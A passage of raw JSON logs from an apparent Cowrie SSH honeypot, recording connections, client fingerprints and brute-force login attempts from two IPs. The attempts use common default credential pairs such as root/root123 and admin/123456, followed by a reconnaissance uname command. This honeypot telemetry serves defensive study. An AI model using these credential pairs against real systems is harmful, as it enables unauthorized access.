{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:41:06.758570Z","src_ip":"212.227.235.229","session":"04fcd1aea1c6"}
{"eventid":"cowrie.login.success","username":"root","password":"root123","message":"login attempt [root/root123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:41:11.152489Z","src_ip":"212.227.125.160","session":"959bbca17139"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"1234567","message":"login attempt [postgres/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T04:41:12.452778Z","src_ip":"212.227.235.229","session":"04fcd1aea1c6"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:41:14.326875Z","src_ip":"212.227.235.229","session":"04fcd1aea1c6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:41:21.077857Z","src_ip":"212.227.125.160","session":"959bbca17139"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T04:41:21.078633Z","src_ip":"212.227.125.160","session":"959bbca17139"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47490,"dst_ip":"1.2.3.4","dst_port":22,"session":"44d491fd5500","protocol":"ssh","message":"New connection: 212.227.125.160:47490 (1.2.3.4:22) [session: 44d491fd5500]","sensor":"my-vps","timestamp":"2025-08-31T04:41:22.692845Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:41:22.693869Z","src_ip":"212.227.125.160","session":"44d491fd5500"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:41:22.876394Z","src_ip":"212.227.125.160","session":"44d491fd5500"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456","message":"login attempt [admin/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T04:41:23.425294Z","src_ip":"212.227.125.160","session":"44d491fd5500"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"2.5","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:41:23.540802Z","src_ip":"212.227.125.160","session":"959bbca17139"}
{"eventid":"cowrie.session.closed","duration":"66.1","message":"Connection lost after 66.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:41:23.631312Z","src_ip":"212.227.125.160","session":"959bbca17139"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:41:24.610081Z","src_ip":"212.227.125.160","session":"44d491fd5500"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55974,"dst_ip":"1.2.3.4","dst_port":22,"session":"0152c45a0c56","protocol":"ssh","message":"New connection: 212.227.125.160:55974 (1.2.3.4:22) [session: 0152c45a0c56]","sensor":"my-vps","timestamp":"2025-08-31T04:41:26.753321Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:41:27.334989Z","src_ip":"212.227.125.160","session":"0152c45a0c56"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:41:27.415031Z","src_ip":"212.227.125.160","session":"0152c45a0c56"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58758,"dst_ip":"1.2.3.4","dst_port":22,"session":"d4dd1e72ef59","protocol":"ssh","message":"New connection: 212.227.125.160:58758 (1.2.3.4:22) [session: d4dd1e72ef59]","sensor":"my-vps","timestamp":"2025-08-31T04:41:28.082421Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:41:28.089592Z","src_ip":"212.227.125.160","session":"d4dd1e72ef59"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:41:28.269998Z","src_ip":"212.227.125.160","session":"d4dd1e72ef59"}
{"eventid":"cowrie.login.success","username":"root","password":"1Q2w3e4r","message":"login attempt [root/1Q2w3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:41:29.019435Z","src_ip":"212.227.125.160","session":"d4dd1e72ef59"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"1234567","message":"login attempt [postgres/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T04:41:29.382215Z","src_ip":"212.227.125.160","session":"0152c45a0c56"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:41:29.413929Z","src_ip":"212.227.125.160","session":"d4dd1e72ef59"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T04:41:29.414717Z","src_ip":"212.227.125.160","session":"d4dd1e72ef59"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:41:29.603686Z","src_ip":"212.227.125.160","session":"d4dd1e72ef59"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:41:29.604897Z","src_ip":"212.227.125.160","session":"d4dd1e72ef59"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:41:30.963576Z","src_ip":"212.227.125.160","session":"0152c45a0c56"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41276,"dst_ip":"1.2.3.4","dst_port":22,"session":"addfd4667223","protocol":"ssh","message":"New connection: 212.227.125.160:41276 (1.2.3.4:22) [session: addfd4667223]","sensor":"my-vps","timestamp":"2025-08-31T04:41:31.613214Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:41:34.806695Z","src_ip":"212.227.125.160","session":"addfd4667223"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:41:34.808682Z","src_ip":"212.227.125.160","session":"addfd4667223"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33830,"dst_ip":"1.2.3.4","dst_port":22,"session":"46db1dff74b4","protocol":"ssh","message":"New connection: 212.227.125.160:33830 (1.2.3.4:22) [session: 46db1dff74b4]","sensor":"my-vps","timestamp":"2025-08-31T04:41:38.797918Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:41:38.798861Z","src_ip":"212.227.125.160","session":"46db1dff74b4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:41:38.988176Z","src_ip":"212.227.125.160","session":"46db1dff74b4"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"elastic123","message":"login attempt [elastic/elastic123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:41:39.554538Z","src_ip":"212.227.125.160","session":"46db1dff74b4"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:41:40.745230Z","src_ip":"212.227.125.160","session":"46db1dff74b4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40602,"dst_ip":"1.2.3.4","dst_port":22,"session":"2a06d4c7979b","protocol":"ssh","message":"New connection: 212.227.235.229:40602 (1.2.3.4:22) [session: 2a06d4c7979b]","sensor":"my-vps","timestamp":"2025-08-31T04:41:47.181266Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:41:47.286200Z","src_ip":"212.227.235.229","session":"2a06d4c7979b"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin123","message":"login attempt [admin/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:41:47.472516Z","src_ip":"212.227.125.160","session":"addfd4667223"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:41:47.583185Z","src_ip":"212.227.235.229","session":"2a06d4c7979b"}
{"eventid":"cowrie.login.failed","username":"config","password":"config","message":"login attempt [config/config] failed","sensor":"my-vps","timestamp":"2025-08-31T04:41:48.851537Z","src_ip":"212.227.235.229","session":"2a06d4c7979b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39046,"dst_ip":"1.2.3.4","dst_port":22,"session":"b14dad5641cf","protocol":"ssh","message":"New connection: 212.227.235.229:39046 (1.2.3.4:22) [session: b14dad5641cf]","sensor":"my-vps","timestamp":"2025-08-31T04:41:49.194621Z"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:41:51.397145Z","src_ip":"212.227.235.229","session":"2a06d4c7979b"}
{"eventid":"cowrie.session.closed","duration":"20.2","message":"Connection lost after 20.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:41:51.774253Z","src_ip":"212.227.125.160","session":"addfd4667223"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:41:52.213918Z","src_ip":"212.227.235.229","session":"b14dad5641cf"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:41:52.214705Z","src_ip":"212.227.235.229","session":"b14dad5641cf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33296,"dst_ip":"1.2.3.4","dst_port":22,"session":"07b4ec7cd9d6","protocol":"ssh","message":"New connection: 212.227.235.229:33296 (1.2.3.4:22) [session: 07b4ec7cd9d6]","sensor":"my-vps","timestamp":"2025-08-31T04:41:55.337173Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:41:55.338910Z","src_ip":"212.227.235.229","session":"07b4ec7cd9d6"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.c